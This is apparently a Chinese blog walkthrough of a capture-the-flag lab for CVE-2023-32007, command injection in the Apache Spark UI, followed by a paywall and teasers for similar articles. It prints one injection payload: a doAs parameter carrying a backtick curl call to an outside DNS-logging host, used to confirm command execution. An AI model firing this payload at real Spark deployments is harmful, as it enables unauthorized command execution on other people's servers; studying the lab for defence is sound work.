【春秋云镜】CVE-2023-32007 Apache Spark UI 命令注入漏洞

原创

已于 2024-05-06 10:03:38 修改 · 1.2k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#spark #大数据 #分布式

于 2024-04-19 16:31:15 首次发布

题目解析

Apache Spark UI 提供了通过配置选项 spark.acls.enable 启用 ACL 的可能性。使用身份验证过滤器，这会检查用户是否具有查看或修改应用程序的访问权限。如果启用了 ACL，则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后，恶意用户可能能够访问权限检查功能，该功能最终将根据他们的输入构建 Unix shell 命令并执行它。这将导致任意 shell 命令执行，因为用户 Spark 当前正在运行。此问题早先被披露为 CVE-2022-33891，但错误地声称版本 3.1.3（此后已停产）不会受到影响。此漏洞仅影响维护者不再支持的产品。建议用户升级到支持的 Apache Spark 版本，例如 3.4.0 版本。

漏洞复现

启动环境访问发现是502，原因是点击链接跳转地址中没有端口，查看路径端口为8080

那么直接带着端口8080访问即可

命令执行

使用curl命令探测到目标可以出网

http://eci-2ze4yv5qcgxy5fmq30cx.cloudeci1.ichunqiu.com:8080/jobs/?doAs=`curl http://w2s2ig.dnslog.cn`

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

RisingFan

关注关注

6
点赞
踩
1

收藏

觉得还不错? 一键收藏
4
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Apache Spark远程代码执行漏洞(CVE-2023-32007)漏洞复现

失心少年

08-24

2117

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！Apache Spark 3.4.0之前版本存在命令注入漏洞，该漏洞源于如果ACL启用后，HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟，这将导致任意shell命令执行。

SolarView Compact跨站脚本攻击漏洞分析 CVE-2022-31373

afei001

07-09

813

日本公司 Contec专注于定制化嵌入式计算、工业自动化和IoT通信技术。该公司的 SolarView 太阳能监控和可视化产品用于3万多个发电站。SolarView Compact v6.0通过组件Solar_AiConf.php发现了一个跨站点脚本(XSS)漏洞。攻击者可利用该漏洞发起站点脚本(XSS)攻击。

4 条评论您还未登录，请先登录后发表或查看评论

Apache Spark RCE漏洞（CVE-2023-32007）

zneVue

07-17

1143

Apache Spark 3.4.0 之前版本存在命令注入漏洞，该漏洞源于如果ACL启用后，HttpSecurityFilter 中的代码路径可以允许通过提供任意用户名来执行模拟，这将导致任意 shell 命令执行。

春秋云镜 CVE-2023-1313(*)

m0_62363483的博客

06-01

504

至于为什么想到把php这三个字去掉，这也是我反复尝试弄出来的，因为我用一句话木马将php这三个字符去掉下载后的文件是空白的，这就形成了对比；我又将phpinfo函数把php去掉结果是一样的。如何我这样上传一句话木马：<?我们上传这个代码：<?跟第一个一样，你用蚁剑连还是不行。我们用蚁剑连接返回是空的。

Apache Spark命令执行漏洞（CVE-2023-32007）

最新发布

swordheart的博客

05-14

401

Apache Spark 3.4.0之前版本存在命令注入漏洞，该漏洞源于如果ACL启用后，HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟，这将导致任意shell命令执行。

Apache Spark 任意代码执行漏洞(CVE-2020-9480)

weixin_44047654的博客

03-28

2370

Apache Spark 任意代码执行漏洞(CVE-2020-9480)

漏洞复现：Apache Spark 命令注入（CVE-2022-33891）

qq_42660246的博客

07-20

8252

ApacheSparkUI可以设置选项spark.acls.enable启用ACL，使用身份验证过滤器。用以检查用户是否具有查看或修改应用程序的访问权限。如果启用了ACL则HttpSecurityFilter中的代码路径可以允许用户通过提供任意用户名来执行命令。该功能最终将根据用户输入构建一个Unixshell命令并执行它，最终导致任意命令执行。.........

vulhub漏洞复现-Apache Spark 未授权访问漏洞

遇事不决冲冲冲

10-28

4569

Spark Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎，一个完整的的动力核心，负责计算中数据的来源，数据的操作，数据的管理并将合适的计算结果根据要求给予返回。处理数据处理的目的不同会有很多不同的类别。思路未授权的用户可以向管理节点提交一个应用，这个应用实际上是恶意代码。提交方法有两种利用 REST API 利用 submissions 网关（集成在 7077 端口中）参考 Apache Spark 未授权访问漏洞漏洞复现 docker部署环境时将以 stand

精选资源

Apache Spark 命令注入（CVE-2022-33891）格式化文档

08-10

Apache Spark 是一个流行的开源大...总之，Apache Spark 的命令注入漏洞 CVE-2022-33891 是一个严重的安全问题，可能导致数据泄露、系统被接管甚至整个网络的破坏。及时修补和实施适当的安全措施是防止此类攻击的关键。

Apache Spark UI 命令注入漏洞 [CVE-2022-33891].md

07-09

Apache Spark UI 命令注入漏洞 [CVE-2022-33891]

开源漏洞深度分析|CVE-2022-33891 Apache Spark 命令注入漏洞

LJQClqjc的博客

07-19

1475

棱镜七彩研究院威胁情报团队对CVE-2022-33891 Apache Spark 命令注入漏洞进行了深度分析。

[ 漏洞复现篇 ] Apache Spark 命令注入（CVE-2022-33891）

qq_51577576的博客

08-16

2847

Apache Spark 命令注入（CVE-2022-33891） 👨‍🎓 博主介绍：大家好，我是，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限，欢迎各位大佬指点，相互学习进步！...

【漏洞复现】Apache Spark 未授权访问漏洞

李同學的安全圈

08-31

4797

Apache Spark 未授权访问漏洞，详情请点击内容进入......

Apache Spark UI 命令注入漏洞 CVE-2022-33891

蚁景网安学院

10-18

1386

Apache Spark UI 提供了通过配置选项 spark.acls.enable。使用身份验证过滤器，这检查用户是否有访问权限来查看或修改应用。如果启用了 ACL，则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。

ApacheSpark-命令执行(CVE-2022-33891) 漏洞复现

告白的博客

07-21

2581

Apache Spark存在一处命令注入，该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable启用ACL的可能性，HttpSecurityFilter中的代码路径可以通过提供任意用户名来允许某人执行模拟。恶意用户凭借访问权限检查函数最终将基于其输入构建Unix shell命令并执行它。成功利用此漏洞可导致任意shell命令执行。...

Apache Spark未授权访问漏洞排查

dayouzi的博客

08-14

1957

Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。由于Apache Spark的认证机制存在缺陷，导致共享密钥认证失效。攻击者利用该漏洞，可在未授权的情况下，远程发送精心构造的过程调用指令，启动Spark集群上的应用程序资源，获得目标服务器的权限，实现远程代码执行。相关链接。

spark未授权RCE漏洞学习

weixin_30746117的博客

02-19

1779

Spark简介 spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室开发的通用内存并行计算框架，用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式，包括交互式查询和流处理。spark的一个主要特点是能够在内存中进行计算，及时依赖磁盘进行复杂的运算，Spark依然比MapReduce更加高效。 Spark未...

【安全狗漏洞通告】Apache Spark 命令注入漏洞方案

bocco的博客

07-20

833

近日，安全狗应急响应中心监测到Apache官方发布了安全更新，修复了Apache Spark的一个命令注入漏洞（CVE-2022-33891）。该漏洞源于程序使用了命令拼接，成功利用此漏洞可导致任意shell命令执行。

如何快速解决网站中存在的Web漏洞？

cilin7010的博客

07-23

231

在大数据快速发展的现今阶段，不管多大多小的企业都会存在网络安全问题。有些人就很疑惑，哪里会存在问题呢？事实是只要你的业务是线上的，您有网站就会出现安全问题。其中包括用户隐私信息被不法分子盗取，企业敏感数据被窃取贩卖或者重...

Apache Spark UI 漏洞 CVE-2022-33891：命令注入分析与利用

Apache Spark UI 存在一个命令注入漏洞，该漏洞被标识为 CVE-2022-33891。此问题可能导致攻击者在受影响的 Spark 集群上执行任意系统命令，从而对系统安全造成严重威胁。一个简化的 PoC（Proof of Concept）脚本被...